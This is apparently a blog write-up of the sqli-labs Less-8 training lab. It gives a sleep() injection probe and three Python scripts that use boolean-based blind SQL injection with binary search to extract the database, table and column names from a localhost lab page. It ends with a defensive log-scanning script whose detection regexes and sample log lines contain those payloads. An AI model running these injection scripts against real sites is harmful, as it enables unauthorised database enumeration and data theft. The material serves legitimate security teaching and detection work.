
sqli-labs Less-8

?id=1' and sleep(2)--+

The delay confirms that the page has an injection point. The script below then extracts the database name with a blind injection; note that it uses the boolean oracle (whether the lab prints "You are in") rather than a time delay:

import requests


def oracle(url, condition):
    """Return True when the lab page confirms the injected condition ("You are in")."""
    r = requests.get(url, params={"id": f"1' and {condition}-- "})
    return 'You are in' in r.text


def inject_database(url):
    """Recover the current database name one character at a time."""
    name = ''  # accumulates the guessed database name
    for i in range(1, 20):  # assume the name is shorter than 20 characters
        # ascii('') is 0 in MySQL, so this test fails once i is past the end of the
        # name. Without it the binary search converges to its lower bound and
        # appends '0' for every remaining position.
        if not oracle(url, f"ascii(substr(database(),{i},1))>0"):
            break
        # low, high, middle drive a binary search over the ASCII range '0'..'z'
        low, high = 48, 122
        while low < high:
            middle = (low + high) // 2
            # the payload asks whether the i-th character's ASCII value exceeds middle
            if oracle(url, f"ascii(substr(database(),{i},1))>{middle}"):
                low = middle + 1
            else:
                high = middle
        if low > 32:  # skip spaces and non-printable characters
            name += chr(low)
        print(f"Current database name: {name}")
    print(f"Final database name: {name}")


if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    inject_database(url)

Next, a boolean-based blind injection extracts a table name from the database:

- Loop over each character of the table name
- Binary search: narrow the ASCII range (48 to 122) by halving it to determine each character's value
- Build the SQL injection payload: compare the table name's ASCII values character by character using substr() and ascii()
- Send the request and judge the result
- Skip spaces and non-printable characters: only append valid characters

import requests


def oracle(url, condition):
    """Return True when the lab page confirms the injected condition ("You are in")."""
    r = requests.get(url, params={"id": f"1' and {condition}-- "})
    return 'You are in' in r.text


def inject_table_name(url, database_name):
    """Recover the first table name in database_name one character at a time."""
    table_name = ''
    subquery = (f"(select table_name from information_schema.tables "
                f"where table_schema='{database_name}' limit 0,1)")
    for i in range(1, 20):
        # ascii('') is 0: no character at position i means the name is complete
        if not oracle(url, f"ascii(substr({subquery},{i},1))>0"):
            break
        low, high = 48, 122  # binary search over the ASCII range '0'..'z'
        while low < high:
            middle = (low + high) // 2
            if oracle(url, f"ascii(substr({subquery},{i},1))>{middle}"):
                low = middle + 1
            else:
                high = middle
        if low > 32:  # skip spaces and non-printable characters
            table_name += chr(low)
        print(table_name)
    print(f"Final table name: {table_name}")


if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    database_name = "security"  # target database name
    inject_table_name(url, database_name)

The same payload shape guesses the column names of a table:

import requests


def oracle(url, condition):
    """Return True when the lab page confirms the injected condition ("You are in")."""
    r = requests.get(url, params={"id": f"1' and {condition}-- "})
    return 'You are in' in r.text


def inject_column_name(url, database_name, table_name):
    """Recover the first column name of table_name one character at a time."""
    column_name = ''
    subquery = (f"(select column_name from information_schema.columns "
                f"where table_schema='{database_name}' and table_name='{table_name}' limit 0,1)")
    for i in range(1, 20):
        # ascii('') is 0: no character at position i means the name is complete
        if not oracle(url, f"ascii(substr({subquery},{i},1))>0"):
            break
        low, high = 48, 122  # binary search over the ASCII range '0'..'z'
        while low < high:
            middle = (low + high) // 2
            if oracle(url, f"ascii(substr({subquery},{i},1))>{middle}"):
                low = middle + 1
            else:
                high = middle
        if low > 32:  # skip spaces and non-printable characters
            column_name += chr(low)
        print(column_name)
    print(f"Final column name: {column_name}")


if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    database_name = "security"
    table_name = "users"  # target table name
    inject_column_name(url, database_name, table_name)
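As an added defender-side example, not part of the original post: the three scripts above leave one signature in a web server's access log, a burst of requests from a single client whose id parameter contains ascii(substr(...)) compared against a number that changes on every request, usually preceded by a sleep() test. The script below scans constructed Apache-format log lines (sample data, not real traffic) for those two oracle patterns and flags clients that send three or more of them.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format (not from the original
# post). 10.0.0.9 mimics the scripts above: one sleep() probe, then ascii(substr())
# comparisons whose threshold changes each time (a binary search in progress).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2025:10:01:01 +0000] "GET /Less-8/index.php?id=1 HTTP/1.1" 200 721
10.0.0.9 - - [12/Feb/2025:10:01:02 +0000] "GET /Less-8/index.php?id=1%27+and+sleep(2)--+ HTTP/1.1" 200 721
10.0.0.9 - - [12/Feb/2025:10:01:05 +0000] "GET /Less-8/index.php?id=1%27+and+ascii(substr(database()%2C1%2C1))%3E85--+ HTTP/1.1" 200 721
10.0.0.9 - - [12/Feb/2025:10:01:05 +0000] "GET /Less-8/index.php?id=1%27+and+ascii(substr(database()%2C1%2C1))%3E104--+ HTTP/1.1" 200 701
10.0.0.9 - - [12/Feb/2025:10:01:06 +0000] "GET /Less-8/index.php?id=1%27+and+ascii(substr(database()%2C1%2C1))%3E114--+ HTTP/1.1" 200 721
10.0.0.5 - - [12/Feb/2025:10:01:07 +0000] "GET /Less-8/index.php?id=2 HTTP/1.1" 200 735
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# boolean oracle: ascii(substr(...)) compared against a number, as in the scripts above
BOOL_ORACLE = re.compile(r"ascii\s*\(\s*substr\s*\(.*?\)\s*[<>=]+\s*\d+", re.I | re.S)
# time oracle: the sleep(2) test used to confirm the injection point
TIME_ORACLE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)


def classify_request(target):
    """Return 'boolean', 'time' or None for one raw request target (path?query)."""
    # parse_qs undoes the URL encoding, so %27 becomes ' and + becomes a space
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            if BOOL_ORACLE.search(value):
                return "boolean"
            if TIME_ORACLE.search(value):
                return "time"
    return None


def scan_log(text, probe_threshold=3):
    """Count oracle-style probes per client IP; flag clients at or above the threshold."""
    counts = defaultdict(lambda: {"boolean": 0, "time": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_request(m.group("target"))
        if kind:
            counts[m.group("ip")][kind] += 1
    flagged = {ip: c for ip, c in counts.items() if sum(c.values()) >= probe_threshold}
    return dict(counts), flagged
```

Calling scan_log(SAMPLE_LOG) flags only 10.0.0.9 (three boolean probes and one time probe); the ordinary requests from 10.0.0.5 never appear in the counts.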

http://www.lryc.cn/news/536152.html
